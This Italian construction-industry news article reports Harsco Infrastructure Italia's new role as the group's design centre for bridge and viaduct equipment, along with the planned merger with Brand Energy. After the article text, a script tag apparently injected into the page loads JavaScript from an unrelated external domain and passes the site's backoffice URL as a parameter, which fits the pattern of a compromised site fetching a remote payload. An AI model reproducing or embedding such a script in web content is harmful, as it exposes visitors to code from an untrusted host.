1. Home
  2. Notizie e Mercato
  3. Harsco Infrastructure: nuove competenze per la sede italiana

Harsco Infrastructure: nuove competenze per la sede italiana

di
5/5
votato da 1 persone
Harsco Infrastructure Italia diventa il nuovo polo di competenza del Gruppo anche per la progettazione di attrezzature speciali per ponti e viadotti


Ad appena un anno dalla ridefinizione delle aree di competenza all'interno del Gruppo Harsco Infrastructure, che aveva attribuito alla sede italiana l'importante ruolo di centro di competenza per la progettazione  e fornitura di attrezzature per opere idrauliche per tutte le filiali del Gruppo, si aggiunge per Harsco Infrastructure Italia anche la competenza per la progettazione e fornitura di attrezzature speciali per ponti e viadotti.

L'esperienza positiva di un anno di intensa attività progettuale del polo italiano nel settore Hydropower, il  riconosciuto know-how e la competenza tecnica del pool di progettisti italiani hanno portato il Gruppo alla decisione di far confluire sulla sede italiana anche la competenza e la gestione progettuale per le infrastrutture. Da oggi tutti i progetti di ponti e viadotti a livello mondiale, faranno capo alla filiale Harsco Italia, con il suo  team di ingegneri e tecnici specializzati. Con questo importante passo si conferma la validità della formula del "Centro di competenza" che coniuga in modo funzionale e sinergico il know how internazionale con la flessibilità operativa della singola filiale.

Il nuovo ruolo di Harsco Italia nel settore Infrastrutture é stato ufficialmente presentato al Gruppo a Turate, a fine settembre. L' incontro con i rappresentanti delle altre sedi ha rappresentato un'ottima opportunità per chiarire e valorizzare le possibili aree di collaborazione e le strategie di approccio al mercato, nella progettazione di realizzazioni di alto profilo ingegneristico, tenendo conto dei maggiori progetti infrastrutturali di ponti e viadotti oggi presenti nel mondo. Ne sono emersi i veri punti di forza del brand Harsco in questo settore: l'ampia gamma di soluzioni specifiche, standard e speciali, l'elevato grado di qualità e di sicurezza dei prodotti e la continuità della consulenza al cliente, dalla fase progettuale a quella di realizzazione.  L'ottima collaborazione tra le sedi Harsco nel mondo e il team di progettisti del centro di competenza italiano porterà sicuramente ad un rafforzamento del Gruppo nel settore infrastrutture, in linea con le attuali strategie della società madre, Harsco Corporation.

Harsco Corporation ha, infatti, appena annunciato un accordo finalizzato a combinare il business Harsco Infrastructure con la società americana Brand Energy and Infrastructure Services, allo scopo di creare un leader globale nel settore dei servizi speciali per l'edilizia e l'industria. L'accordo stipulato unirà due delle principali aziende del settore, a livello mondiale. La nuova società risultante dalla fusione di Harsco Infrastructure e Brand potrà vantare oltre 150 anni di esperienza operativa e un marchio geografico unico, presente con 300 sedi in più di 30 paesi, rispondendo alle esigenze di oltre 15.000 clienti in tutto il mondo, con l'obiettivo di condividere l'impegno a offrire eccellenza operativa e un maggior grado di sicurezza e servizio al cliente.


<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2013-10-10&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&amp;cb=0.2936528246390937" type="text/javascript"></script>